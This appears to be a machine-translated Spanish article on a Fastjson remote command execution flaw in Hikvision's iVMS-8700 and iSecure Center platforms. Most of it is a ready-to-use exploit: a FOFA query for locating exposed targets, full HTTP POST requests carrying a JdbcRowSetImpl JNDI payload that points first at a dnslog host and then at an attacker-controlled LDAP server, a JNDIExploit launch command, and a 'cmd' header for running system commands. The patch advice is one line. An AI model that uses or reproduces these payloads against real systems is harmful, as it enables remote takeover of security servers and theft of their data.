Plataforma de gestión de seguridad integrada de Hikvision Vulnerabilidad de ejecución de comandos remotos Fastjson
Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para participar en pruebas ilegales. Cualquier consecuencia directa o indirecta y las pérdidas causadas por la difusión y el uso de la información o las herramientas proporcionadas en este artículo correrán a cargo del propio usuario. Las consecuencias adversas tienen nada que ver con el autor del artículo. Este artículo es solo para fines educativos.
1. Breve introducción de la plataforma de gestión de seguridad integrada de Hikvision
La plataforma integral de administración de seguridad está diseñada en base al concepto de "arquitectura de tecnología de software unificada" y adopta la tecnología de componentes comerciales para cumplir con la expansión elástica de la plataforma en términos comerciales. La plataforma es aplicable al negocio general de seguridad integral de toda la industria, integra y administra de forma centralizada los recursos de cada sistema y realiza una implementación, configuración, administración y programación unificadas.
2. Descripción de la vulnerabilidad
La plataforma integral de gestión de seguridad de Hikvision tiene una vulnerabilidad de ejecución de comandos remotos Fastjson, que puede ejecutar comandos del sistema y obtener permisos del sistema e información de datos confidenciales del servidor de destino.
Tres, la versión de impacto
V2.0.0 <= iVMS-8700 <= V2.9.2
V1.0.0 <= iSecure Center <= V1.7.0
4. Recurrencia de la vulnerabilidad
FOFA: app="HIKVISION-Plataforma Integral de Gestión de Seguridad"
El paquete de datos de vulnerabilidad es el siguiente:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 196
{
"a":{
"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}
Primero, pruebe si ldap puede ejecutar dnslog para hacer eco.Si se puede recibir la solicitud, existe una alta probabilidad de que exista una vulnerabilidad de ejecución de comando.
Xiaolong POC Hara con un clic Menos
Portal POC de Xiaolong: herramienta POC de Xiaolong
Después de confirmar que dnslog puede recibir la solicitud, se puede seguir utilizando.Utilice la herramienta JNDIExploit-1.3-SNAPSHOT.jar para ejecutar el siguiente comando
Dirección de descarga de la herramienta: JNDIExploit
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip
Luego agregue campos al encabezado del paquete de solicitud de Burp cmd: whoami. Aquí cmd puede ejecutar comandos del sistema. En la carga útil a continuación, cambie ldap a su VPSip/Basic/TomcatEcho, de la siguiente manera:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215
{
"a":{
"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
¡Burp pone el paquete y ejecuta
la ejecución del comando con éxito! ! !
5. Plan de reparación
En la actualidad, el fabricante proporciona parches de reparación, visite el sitio web oficial para descargar los parches de la versión correspondiente.